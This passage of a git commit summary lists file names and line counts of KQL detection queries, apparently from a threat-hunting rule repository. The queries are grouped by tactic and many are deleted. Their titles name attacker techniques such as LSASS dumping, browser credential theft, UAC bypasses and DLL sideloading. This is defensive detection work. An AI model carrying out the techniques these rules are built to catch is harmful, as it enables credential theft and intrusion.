...al_CCleanerReactivator.DLL_Sideloading.kql | 7 - ...ijacking_Via_TreatAs_Subkey_-_Registry.kql | 7 - ...al_Chrome_Frame_Helper_DLL_Sideloading.kql | 7 - ...tential_DLL_Sideloading_Of_DBGCORE.DLL.kql | 7 - ...tential_DLL_Sideloading_Of_DBGHELP.DLL.kql | 7 - ...Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql | 7 - ..._Sideloading_Via_ClassicExplorer32.dll.kql | 7 - ...Potential_DLL_Sideloading_Via_JsSchHlp.kql | 7 - ...ntial_DLL_Sideloading_Via_comctl32.dll.kql | 7 - .../Potential_Libvlc.DLL_Sideloading.kql | 7 - ...otential_PSFactoryBuffer_COM_Hijacking.kql | 7 - ...rsistence_Attempt_Via_ErrorHandler.Cmd.kql | 9 - ...Attempt_Via_Existing_Service_Tampering.kql | 7 - ...nce_Attempt_Via_Run_Keys_Using_Reg.EXE.kql | 7 - .../Potential_Persistence_Using_DebugPath.kql | 7 - ...Via_AppCompat_RegisterAppRestart_Layer.kql | 10 - ...istence_Via_App_Paths_Default_Property.kql | 11 - .../Potential_Persistence_Via_AutodialDLL.kql | 7 - ...tential_Persistence_Via_CHM_Helper_DLL.kql | 7 - ...OM_Hijacking_From_Suspicious_Locations.kql | 7 - ...istence_Via_COM_Search_Order_Hijacking.kql | 7 - ...ential_Persistence_Via_DLLPathOverride.kql | 7 - ...ce_Via_Disk_Cleanup_Handler_-_Registry.kql | 13 - ...ersistence_Via_Event_Viewer_Events.asp.kql | 7 - ...ersistence_Via_Excel_Add-in_-_Registry.kql | 7 - .../Potential_Persistence_Via_GlobalFlags.kql | 7 - ...tential_Persistence_Via_LSA_Extensions.kql | 9 - ...stence_Via_Logon_Scripts_-_CommandLine.kql | 7 - ...rsistence_Via_Logon_Scripts_-_Registry.kql | 7 - ..._Via_Microsoft_Compatibility_Appraiser.kql | 9 - ...ersistence_Via_Microsoft_Office_Add-In.kql | 7 - ...ce_Via_Microsoft_Office_Startup_Folder.kql | 7 - .../Potential_Persistence_Via_Mpnotify.kql | 7 - ...rsistence_Via_MyComputer_Registry_Keys.kql | 7 - ...ntial_Persistence_Via_Netsh_Helper_DLL.kql | 8 - ...stence_Via_Netsh_Helper_DLL_-_Registry.kql | 8 - ...ence_Via_New_AMSI_Providers_-_Registry.kql | 7 - ...tial_Persistence_Via_Notepad++_Plugins.kql | 7 - 
...Potential_Persistence_Via_Outlook_Form.kql | 7 - ...tial_Persistence_Via_Outlook_Home_Page.kql | 7 - ...utlook_LoadMacroProviderOnBoot_Setting.kql | 7 - ...al_Persistence_Via_Outlook_Today_Pages.kql | 7 - ...wershell_Search_Order_Hijacking_-_Task.kql | 7 - ...rsistence_Via_Scrobj.dll_COM_Hijacking.kql | 7 - ...Via_Shim_Database_In_Uncommon_Location.kql | 7 - ...istence_Via_Shim_Database_Modification.kql | 9 - .../Potential_Persistence_Via_TypedPaths.kql | 7 - ...eToolBoxCmd.EXE_VM_State_Change_Script.kql | 7 - ...nce_Via_Visual_Studio_Tools_for_Office.kql | 7 - ...al_PrintNightmare_Exploitation_Attempt.kql | 7 - ...ation_Attempt_Via_.Exe.Local_Technique.kql | 7 - ...tion_Using_Symlink_Between_Osk_and_Cmd.kql | 7 - ...thorized_MBR_Tampering_Via_Bcdedit.EXE.kql | 7 - ...istence_Attempt_Via_DbgManagedDebugger.kql | 7 - ...sistence_Attempt_Via_Windows_Telemetry.kql | 11 - ...ential_RipZip_Attack_on_Startup_Folder.kql | 10 - ...ll_Context_Menu_Scan_Command_Tampering.kql | 7 - ...m_Database_Persistence_via_Sdbinst.EXE.kql | 9 - ...hortcut_Persistence_Via_PowerShell.EXE.kql | 11 - ...tial_Suspicious_Activity_Using_SeCEdit.kql | 7 - ...picious_PowerShell_Module_File_Created.kql | 7 - ..._Sideloading_From_Non_System_Locations.kql | 7 - ...azuh_Security_Platform_DLL_Sideloading.kql | 7 - ...al_Webshell_Creation_On_Static_Website.kql | 7 - ...ally_Suspicious_ODBC_Driver_Registered.kql | 7 - .../PowerShell_Module_File_Created.kql | 7 - ...File_Created_By_Non-PowerShell_Process.kql | 7 - .../PowerShell_Profile_Modification.kql | 7 - ...hell_Script_Dropped_Via_PowerShell.EXE.kql | 7 - Persistence/Powerup_Write_Hijack_DLL.kql | 10 - ...er_Creation_By_Non-Sysinternals_Binary.kql | 9 - ...er_Creation_By_Non-Sysinternals_Binary.kql | 7 - .../RDP_Sensitive_Settings_Changed.kql | 9 - ...RDP_Sensitive_Settings_Changed_to_Zero.kql | 9 - .../Register_New_IFiltre_For_Persistence.kql | 9 - ..._Modification_to_Hidden_File_Extension.kql | 7 - ...istry_Persistence_via_Explorer_Run_Key.kql 
| 7 - .../Rundll32_Registered_COM_Objects.kql | 7 - ...sions_via_the_Registry_2_VPN_Extension.kql | 7 - ...d_TaskCache_Change_by_Uncommon_Program.kql | 7 - ...heduled_Task_Creation_Via_Schtasks.EXE.kql | 7 - ...xecuting_Encoded_Payload_from_Registry.kql | 7 - ...d_Task_Executing_Payload_from_Registry.kql | 7 - ...Or_Modification_With_SYSTEM_Privileges.kql | 7 - ...vider_(SSP)_Added_to_LSA_Configuration.kql | 8 - Persistence/ServiceDll_Hijack.kql | 9 - ...DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql | 7 - ...curity_Descriptor_Tampering_Via_Sc.EXE.kql | 7 - ...sion_Manager_Autorun_Keys_Modification.kql | 7 - .../Shell_Process_Spawned_by_Java.EXE.kql | 7 - Persistence/Startup_Folder_File_Write.kql | 7 - .../Sticky_Key_Like_Backdoor_Execution.kql | 7 - ...cky_Key_Like_Backdoor_Usage_-_Registry.kql | 7 - .../Suspicious_ASPX_File_Drop_by_Exchange.kql | 7 - ...Suspicious_Child_Process_Of_SQL_Server.kql | 7 - ...icious_Child_Process_Of_Veeam_Dabatase.kql | 7 - ...nstance_Executed_With_Custom_Extension.kql | 7 - ...spicious_Debugger_Registration_Cmdline.kql | 7 - ..._Download_From_Direct_IP_Via_Bitsadmin.kql | 7 - ...rom_File-Sharing_Website_Via_Bitsadmin.kql | 7 - ...spicious_Driver_Install_by_pnputil.exe.kql | 7 - ...vironment_Variable_Has_Been_Registered.kql | 7 - ..._Activity_From_Fake_Recycle.Bin_Folder.kql | 7 - .../Suspicious_File_Drop_by_Exchange.kql | 7 - .../Suspicious_Get-Variable.exe_Creation.kql | 10 - Persistence/Suspicious_GrpConv_Execution.kql | 7 - .../Suspicious_IIS_Module_Registration.kql | 7 - ...SExchangeMailboxReplication_ASPX_Write.kql | 7 - .../Suspicious_New_Service_Creation.kql | 7 - .../Suspicious_Outlook_Macro_Created.kql | 7 - ...eToolBoxCmd.EXE_VM_State_Change_Script.kql | 7 - ...icious_Powershell_In_Registry_Run_Keys.kql | 7 - ...spicious_Process_By_Web_Server_Process.kql | 8 - ...Execution_From_Fake_Recycle.Bin_Folder.kql | 7 - ...spicious_Processes_Spawned_by_Java.EXE.kql | 7 - .../Suspicious_Processes_Spawned_by_WinRM.kql | 7 - 
.../Suspicious_Run_Key_from_Download.kql | 7 - ...ed_Task_Creation_Involving_Temp_Folder.kql | 7 - ...Task_Creation_via_Masqueraded_XML_File.kql | 7 - ...Scheduled_Task_Write_to_System32_Tasks.kql | 7 - ...ious_Schtasks_Execution_AppData_Folder.kql | 7 - ...cious_Screensaver_Binary_File_Creation.kql | 9 - ...CL_Modification_Via_Set-Service_Cmdlet.kql | 7 - .../Suspicious_Service_Path_Modification.kql | 7 - ...s_Shells_Spawn_by_Java_Utility_Keytool.kql | 7 - ...icious_Shim_Database_Patching_Activity.kql | 7 - .../Suspicious_Startup_Folder_Persistence.kql | 7 - ...icious_WindowsTerminal_Child_Processes.kql | 7 - Persistence/Suspicious_desktop.ini_Action.kql | 7 - .../Sysinternals_PsService_Execution.kql | 7 - .../Sysinternals_PsSuspend_Execution.kql | 7 - ...stem_Scripts_Autorun_Keys_Modification.kql | 7 - Persistence/Tasks_Folder_Evasion.kql | 10 - .../Third_Party_Software_DLL_Sideloading.kql | 7 - Persistence/UAC_Bypass_With_Fake_DLL.kql | 7 - ..._Persistence_Via_Wpbbin_-_FileCreation.kql | 7 - ...rsistence_Via_Wpbbin_-_ProcessCreation.kql | 7 - ..._Database_Installation_Via_Sdbinst.EXE.kql | 9 - ..._One_Time_Only_Scheduled_Task_At_00_00.kql | 7 - .../Uncommon_Userinit_Child_Process.kql | 7 - ...allation_Attempt_Using_Add-AppxPackage.kql | 7 - .../User_Added_To_Highly_Privileged_Group.kql | 7 - ...er_Added_to_Local_Administrators_Group.kql | 7 - ...er_Added_to_Remote_Desktop_Users_Group.kql | 7 - .../VBScript_Payload_Stored_in_Registry.kql | 7 - .../VMToolsd_Suspicious_Child_Process.kql | 7 - ...VsCode_Powershell_Profile_Modification.kql | 7 - Persistence/WINEKEY_Registry_Modification.kql | 7 - ...mers_Activity_Via_Scrcons.EXE_DLL_Load.kql | 7 - .../WMI_Backdoor_Exchange_Transport_Agent.kql | 7 - ...sistence_-_Command_Line_Event_Consumer.kql | 7 - ...MI_Persistence_-_Script_Event_Consumer.kql | 7 - ...nce_-_Script_Event_Consumer_File_Write.kql | 7 - ...l_Detection_With_Command_Line_Keywords.kql | 7 - .../Webshell_Hacking_Activity_Patterns.kql | 8 - 
.../Webshell_Tool_Reconnaissance_Activity.kql | 8 - .../WinSock2_Autorun_Keys_Modification.kql | 7 - ...Spooler_Service_Suspicious_Binary_Load.kql | 7 - ...tings_Modification_By_Uncommon_Process.kql | 7 - .../Winget_Admin_Settings_Modification.kql | 7 - ...inlogon_AllowMultipleTSSessions_Enable.kql | 10 - .../Winlogon_Notify_Key_Logon_Persistence.kql | 9 - ...Node_Classes_Autorun_Keys_Modification.kql | 7 - ...rrentVersion_Autorun_Keys_Modification.kql | 7 - ...rrentVersion_Autorun_Keys_Modification.kql | 7 - ...Of_Malicious_Files_To_The_Fonts_Folder.kql | 7 - ...sions_to_Hide_Services_Via_Set-Service.kql | 7 - ...rivilege_by_Arbitrary_Parent_Processes.kql | 7 - ...levated_MSI_Spawned_Cmd_And_Powershell.kql | 7 - ...ays_Install_Elevated_Windows_Installer.kql | 7 - ...work_Service_Potential_DLL_Sideloading.kql | 7 - .../Bypass_UAC_Using_DelegateExecute.kql | 7 - .../Bypass_UAC_Using_SilentCleanup_Task.kql | 10 - Privilege Escalation/Bypass_UAC_via_CMSTP.kql | 7 - .../Bypass_UAC_via_Fodhelper.exe.kql | 7 - .../Bypass_UAC_via_WSReset.exe.kql | 7 - ...CMSTP_UAC_Bypass_via_COM_Object_Access.kql | 7 - Privilege Escalation/COM_Hijack_via_Sdclt.kql | 7 - .../Creation_Of_Non-Existent_System_DLL.kql | 9 - ..._Hijackig_Via_Additional_Space_in_Path.kql | 9 - .../DLL_Sideloading_Of_ShellChromeAPI.DLL.kql | 9 - ...R_DLL_Loaded_By_Scripting_Applications.kql | 7 - ...ing_COR_Profiler_Environment_Variables.kql | 7 - .../HackTool_-_CrackMapExec_Execution.kql | 7 - ...ackTool_-_Empire_PowerShell_UAC_Bypass.kql | 7 - ...ackTool_-_SharpImpersonation_Execution.kql | 7 - ...kTool_-_SharpUp_PrivEsc_Tool_Execution.kql | 7 - .../HackTool_-_WinPwn_Execution.kql | 8 - .../HackTool_-_winPEAS_Execution.kql | 7 - Privilege Escalation/Interactive_AT_Job.kql | 7 - .../LiveKD_Driver_Creation.kql | 7 - ...KD_Driver_Creation_By_Uncommon_Process.kql | 7 - ...LiveKD_Kernel_Memory_Dump_File_Created.kql | 7 - ...ropped_in_the_Teams_or_OneDrive_Folder.kql | 9 - 
...inject_Inject_DLL_Into_Running_Process.kql | 7 - .../Microsoft_Office_DLL_Sideload.kql | 7 - .../Modify_Group_Policy_Settings.kql | 7 - ...odify_User_Shell_Folders_Startup_Value.kql | 7 - .../New_Kernel_Driver_Via_SC.EXE.kql | 7 - .../New_Service_Creation_Using_PowerShell.kql | 7 - .../New_Service_Creation_Using_Sc.EXE.kql | 7 - ...ders_Registered_With_Uncommon_DLL_Name.kql | 10 - .../PSEXEC_Remote_Execution_File_Artefact.kql | 7 - .../PUA_-_AdvancedRun_Execution.kql | 7 - ...PUA_-_AdvancedRun_Suspicious_Execution.kql | 7 - .../PUA_-_Wsudo_Suspicious_Execution.kql | 7 - ...rd_Provided_In_Command_Line_Of_Net.EXE.kql | 7 - .../Path_To_Screensaver_Binary_Modified.kql | 7 - .../Persistence_Via_Sticky_Key_Backdoor.kql | 9 - ...scalation_via_Weak_Service_Permissions.kql | 7 - .../Potential_7za.DLL_Sideloading.kql | 7 - .../Potential_AVKkid.DLL_Sideloading.kql | 7 - ...ial_Antivirus_Software_DLL_Sideloading.kql | 7 - .../Potential_Azure_Browser_SSO_Abuse.kql | 9 - .../Potential_CCleanerDU.DLL_Sideloading.kql | 7 - ...al_CCleanerReactivator.DLL_Sideloading.kql | 7 - ...al_Chrome_Frame_Helper_DLL_Sideloading.kql | 7 - ...trike_Service_Installations_-_Registry.kql | 8 - ...tential_DLL_Sideloading_Of_DBGCORE.DLL.kql | 7 - ...tential_DLL_Sideloading_Of_DBGHELP.DLL.kql | 7 - ...Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql | 7 - ..._Sideloading_Via_ClassicExplorer32.dll.kql | 7 - ...Potential_DLL_Sideloading_Via_JsSchHlp.kql | 7 - ...ntial_DLL_Sideloading_Via_comctl32.dll.kql | 7 - .../Potential_EACore.DLL_Sideloading.kql | 7 - .../Potential_Edputil.DLL_Sideloading.kql | 7 - .../Potential_Goopdate.DLL_Sideloading.kql | 7 - .../Potential_Iviewers.DLL_Sideloading.kql | 7 - .../Potential_Libvlc.DLL_Sideloading.kql | 7 - .../Potential_Mfdetours.DLL_Sideloading.kql | 7 - .../Potential_Persistence_Via_GlobalFlags.kql | 7 - ...ntial_Persistence_Via_Netsh_Helper_DLL.kql | 8 - ...al_PrintNightmare_Exploitation_Attempt.kql | 7 - ...ation_Attempt_Via_.Exe.Local_Technique.kql | 7 - 
...tion_Using_Symlink_Between_Osk_and_Cmd.kql | 7 - ...ation_via_Service_Permissions_Weakness.kql | 7 - .../Potential_Rcdll.DLL_Sideloading.kql | 7 - ....DLL_Sideloading_From_Default_Location.kql | 7 - ..._Sideloading_From_Non-Default_Location.kql | 7 - .../Potential_RoboForm.DLL_Sideloading.kql | 7 - ...otential_ShellDispatch.DLL_Sideloading.kql | 7 - ...m_Database_Persistence_via_Sdbinst.EXE.kql | 9 - .../Potential_SmadHook.DLL_Sideloading.kql | 7 - ...ential_SolidPDFCreator.DLL_Sideloading.kql | 7 - ...tial_Suspicious_Activity_Using_SeCEdit.kql | 7 - ..._Sideloading_From_Non_System_Locations.kql | 7 - .../Potential_UAC_Bypass_Via_Sdclt.EXE.kql | 7 - .../Potential_Vivaldi_elf.DLL_Sideloading.kql | 7 - .../Potential_WWlib.DLL_Sideloading.kql | 7 - .../Potential_Waveedit.DLL_Sideloading.kql | 7 - ...azuh_Security_Platform_DLL_Sideloading.kql | 7 - .../Potential_appverifUI.DLL_Sideloading.kql | 7 - ...ious_Child_Process_of_KeyScrambler.exe.kql | 7 - ..._Suspicious_Event_Viewer_Child_Process.kql | 7 - .../PowerShell_Profile_Modification.kql | 7 - .../Powerup_Write_Hijack_DLL.kql | 10 - ...rocess_Creation_Using_Sysnative_Folder.kql | 7 - ...er_Creation_By_Non-Sysinternals_Binary.kql | 9 - ...er_Creation_By_Non-Sysinternals_Binary.kql | 7 - .../Regedit_as_Trusted_Installer.kql | 7 - .../Renamed_Mavinject.EXE_Execution.kql | 7 - .../Rundll32_Registered_COM_Objects.kql | 7 - ...heduled_Task_Creation_Via_Schtasks.EXE.kql | 7 - .../Sdclt_Child_Processes.kql | 7 - ..._Privileges_Enumeration_Via_Whoami.EXE.kql | 7 - Privilege Escalation/ServiceDll_Hijack.kql | 9 - ...DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql | 7 - ...curity_Descriptor_Tampering_Via_Sc.EXE.kql | 7 - .../Shell_Open_Registry_Keys_Manipulation.kql | 7 - .../Shell_Process_Spawned_by_Java.EXE.kql | 7 - .../Sticky_Key_Like_Backdoor_Execution.kql | 7 - ...cky_Key_Like_Backdoor_Usage_-_Registry.kql | 7 - .../Suspect_Svchost_Activity.kql | 7 - ...icious_Child_Process_Created_as_System.kql | 7 - 
...Suspicious_Child_Process_Of_SQL_Server.kql | 7 - ...icious_Child_Process_Of_Veeam_Dabatase.kql | 7 - ...Suspicious_Child_Process_Of_Wermgr.EXE.kql | 7 - ...spicious_Debugger_Registration_Cmdline.kql | 7 - ...ication_on_the_Printer_Spooler_Service.kql | 7 - .../Suspicious_New_Service_Creation.kql | 7 - ...ious_Printer_Driver_Empty_Manufacturer.kql | 7 - ...spicious_Processes_Spawned_by_Java.EXE.kql | 7 - .../Suspicious_Processes_Spawned_by_WinRM.kql | 7 - ...Suspicious_RunAs-Like_Flag_Combination.kql | 7 - ...uspicious_SYSTEM_User_Process_Creation.kql | 7 - ...uspicious_ScreenSave_Change_by_Reg.exe.kql | 9 - .../Suspicious_Service_Path_Modification.kql | 7 - ...s_Shells_Spawn_by_Java_Utility_Keytool.kql | 7 - ...Suspicious_Spool_Service_Child_Process.kql | 7 - .../Third_Party_Software_DLL_Sideloading.kql | 7 - ...ass_Abusing_Winsat_Path_Parsing_-_File.kql | 7 - ..._Abusing_Winsat_Path_Parsing_-_Process.kql | 7 - ...Abusing_Winsat_Path_Parsing_-_Registry.kql | 7 - ...AC_Bypass_Tools_Using_ComputerDefaults.kql | 7 - ...Bypass_Using_.NET_Code_Profiler_on_MMC.kql | 7 - .../UAC_Bypass_Using_ChangePK_and_SLUI.kql | 7 - ...pass_Using_Consent_and_Comctl32_-_File.kql | 7 - ...s_Using_Consent_and_Comctl32_-_Process.kql | 7 - .../UAC_Bypass_Using_Disk_Cleanup.kql | 7 - .../UAC_Bypass_Using_DismHost.kql | 7 - .../UAC_Bypass_Using_EventVwr.kql | 7 - ..._Bypass_Using_Event_Viewer_RecentViews.kql | 7 - .../UAC_Bypass_Using_IDiagnostic_Profile.kql | 7 - ...ypass_Using_IDiagnostic_Profile_-_File.kql | 7 - .../UAC_Bypass_Using_IEInstal_-_File.kql | 7 - .../UAC_Bypass_Using_IEInstal_-_Process.kql | 7 - .../UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql | 7 - ...ing_MSConfig_Token_Modification_-_File.kql | 7 - ..._MSConfig_Token_Modification_-_Process.kql | 7 - ...Bypass_Using_NTFS_Reparse_Point_-_File.kql | 7 - ...ass_Using_NTFS_Reparse_Point_-_Process.kql | 7 - .../UAC_Bypass_Using_PkgMgr_and_DISM.kql | 7 - ...pass_Using_Windows_Media_Player_-_File.kql | 7 - 
...s_Using_Windows_Media_Player_-_Process.kql | 7 - ..._Using_Windows_Media_Player_-_Registry.kql | 7 - .../UAC_Bypass_Via_Wsreset.kql | 7 - Privilege Escalation/UAC_Bypass_WSReset.kql | 7 - .../UAC_Bypass_With_Fake_DLL.kql | 7 - .../UAC_Bypass_via_Event_Viewer.kql | 7 - .../UAC_Bypass_via_ICMLuaUtil.kql | 7 - Privilege Escalation/UAC_Bypass_via_Sdclt.kql | 7 - ...ss_via_Windows_Firewall_Snap-In_Hijack.kql | 7 - Privilege Escalation/UAC_Disabled.kql | 8 - .../UAC_Notification_Disabled.kql | 10 - .../UAC_Secure_Desktop_Prompt_Disabled.kql | 10 - ..._Database_Installation_Via_Sdbinst.EXE.kql | 9 - ..._One_Time_Only_Scheduled_Task_At_00_00.kql | 7 - ...VsCode_Powershell_Profile_Modification.kql | 7 - ...mers_Activity_Via_Scrcons.EXE_DLL_Load.kql | 7 - ...MI_Persistence_-_Script_Event_Consumer.kql | 7 - ....EXE_Execution_From_Privileged_Process.kql | 7 - .../Windows_Kernel_Debugger_Execution.kql | 7 - ...Spooler_Service_Suspicious_Binary_Load.kql | 7 - README.md | 170 ++++++++----- helper.py | 237 ++++++++++++++++++ requirements.txt | 15 ++ 4082 files changed, 26482 insertions(+), 13667 deletions(-) delete mode 100644 Collection/7Zip_Compressing_Dump_Files.kql delete mode 100644 Collection/Audio_Capture_via_PowerShell.kql delete mode 100644 Collection/Audio_Capture_via_SoundRecorder.kql delete mode 100644 Collection/Automated_Collection_Command_Prompt.kql delete mode 100644 Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql delete mode 100644 Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql delete mode 100644 Collection/Compressed_File_Creation_Via_Tar.EXE.kql delete mode 100644 Collection/Compressed_File_Extraction_Via_Tar.EXE.kql delete mode 100644 Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql delete mode 100644 Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql delete mode 100644 Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql delete mode 100644 
Collection/Esentutl_Steals_Browser_Information.kql delete mode 100644 Collection/Exchange_PowerShell_Snap-Ins_Usage.kql delete mode 100644 Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql delete mode 100644 Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql delete mode 100644 Collection/PUA_-_Mouse_Lock_Execution.kql delete mode 100644 Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql delete mode 100644 Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql delete mode 100644 Collection/Rar_Usage_with_Password_and_Compression_Level.kql delete mode 100644 Collection/Recon_Information_for_Export_with_Command_Prompt.kql delete mode 100644 Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql delete mode 100644 Collection/SQLite_Chromium_Profile_Data_DB_Access.kql delete mode 100644 Collection/SQLite_Firefox_Profile_Data_DB_Access.kql delete mode 100644 Collection/Screen_Capture_Activity_Via_Psr.EXE.kql delete mode 100644 Collection/Suspicious_Camera_and_Microphone_Access.kql delete mode 100644 Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql delete mode 100644 Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql delete mode 100644 Collection/Veeam_Backup_Database_Suspicious_Query.kql delete mode 100644 Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql delete mode 100644 Collection/Windows_Recall_Feature_Enabled_-_Registry.kql delete mode 100644 Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql delete mode 100644 Collection/Winrar_Compressing_Dump_Files.kql delete mode 100644 Collection/Winrar_Execution_in_Non-Standard_Folder.kql delete mode 100644 Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql delete mode 100644 Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql delete mode 100644 Credential 
Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql delete mode 100644 Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql delete mode 100644 Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql delete mode 100644 Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql delete mode 100644 Credential Access/Automated_Collection_Command_Prompt.kql delete mode 100644 Credential Access/Browser_Started_with_Remote_Debugging.kql delete mode 100644 Credential Access/Capture_Credentials_with_Rpcping.exe.kql delete mode 100644 Credential Access/Certificate_Exported_Via_PowerShell.kql delete mode 100644 Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql delete mode 100644 Credential Access/CrackMapExec_File_Indicators.kql delete mode 100644 Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql delete mode 100644 Credential Access/Cred_Dump_Tools_Dropped_Files.kql delete mode 100644 Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql delete mode 100644 Credential Access/Dropping_Of_Password_Filter_DLL.kql delete mode 100644 Credential Access/Dumping_Process_via_Sqldumper.exe.kql delete mode 100644 Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql delete mode 100644 Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql delete mode 100644 Credential Access/Enumeration_for_Credentials_in_Registry.kql delete mode 100644 Credential Access/Esentutl_Gather_Credentials.kql delete mode 100644 Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql delete mode 100644 Credential Access/Findstr_GPP_Passwords.kql delete mode 100644 Credential Access/HackTool_-_ADCSPwn_Execution.kql delete mode 100644 Credential Access/HackTool_-_Certify_Execution.kql delete mode 100644 Credential Access/HackTool_-_Certipy_Execution.kql delete mode 100644 Credential Access/HackTool_-_CrackMapExec_Execution.kql delete mode 100644 
Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql delete mode 100644 Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql delete mode 100644 Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql delete mode 100644 Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql delete mode 100644 Credential Access/HackTool_-_Inveigh_Execution.kql delete mode 100644 Credential Access/HackTool_-_KrbRelayUp_Execution.kql delete mode 100644 Credential Access/HackTool_-_KrbRelay_Execution.kql delete mode 100644 Credential Access/HackTool_-_Mimikatz_Execution.kql delete mode 100644 Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql delete mode 100644 Credential Access/HackTool_-_Quarks_PwDump_Execution.kql delete mode 100644 Credential Access/HackTool_-_Rubeus_Execution.kql delete mode 100644 Credential Access/HackTool_-_SafetyKatz_Execution.kql delete mode 100644 Credential Access/HackTool_-_SecurityXploded_Execution.kql delete mode 100644 Credential Access/HackTool_-_WinPwn_Execution.kql delete mode 100644 Credential Access/Hacktool_Execution_-_PE_Metadata.kql delete mode 100644 Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql delete mode 100644 Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql delete mode 100644 Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql delete mode 100644 Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql delete mode 100644 Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql delete mode 100644 Credential Access/LSASS_Process_Memory_Dump_Files.kql delete mode 100644 Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql delete mode 100644 Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql delete mode 100644 Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql delete mode 100644 Credential 
Access/Microsoft_IIS_Service_Account_Password_Dumped.kql delete mode 100644 Credential Access/Mimikatz_Kirbi_File_Creation.kql delete mode 100644 Credential Access/NPPSpy_Hacktool_Usage.kql delete mode 100644 Credential Access/NTDS.DIT_Created.kql delete mode 100644 Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql delete mode 100644 Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql delete mode 100644 Credential Access/NTDS_Exfiltration_Filename_Patterns.kql delete mode 100644 Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql delete mode 100644 Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql delete mode 100644 Credential Access/PUA_-_DIT_Snapshot_Viewer.kql delete mode 100644 Credential Access/PUA_-_Mouse_Lock_Execution.kql delete mode 100644 Credential Access/PUA_-_WebBrowserPassView_Execution.kql delete mode 100644 Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql delete mode 100644 Credential Access/PktMon.EXE_Execution.kql delete mode 100644 Credential Access/Potential_Browser_Data_Stealing.kql delete mode 100644 Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql delete mode 100644 Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql delete mode 100644 Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql delete mode 100644 Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql delete mode 100644 Credential Access/Potential_Credential_Dumping_Via_WER.kql delete mode 100644 Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql delete mode 100644 Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql delete mode 100644 Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql delete mode 100644 Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql delete 
mode 100644 Credential Access/Potential_Remote_Credential_Dumping_Activity.kql delete mode 100644 Credential Access/Potential_SAM_Database_Dump.kql delete mode 100644 Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql delete mode 100644 Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql delete mode 100644 Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql delete mode 100644 Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql delete mode 100644 Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql delete mode 100644 Credential Access/PowerShell_Get-Process_LSASS.kql delete mode 100644 Credential Access/PowerShell_SAM_Copy.kql delete mode 100644 Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql delete mode 100644 Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql delete mode 100644 Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql delete mode 100644 Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql delete mode 100644 Credential Access/QuarksPwDump_Dump_File.kql delete mode 100644 Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql delete mode 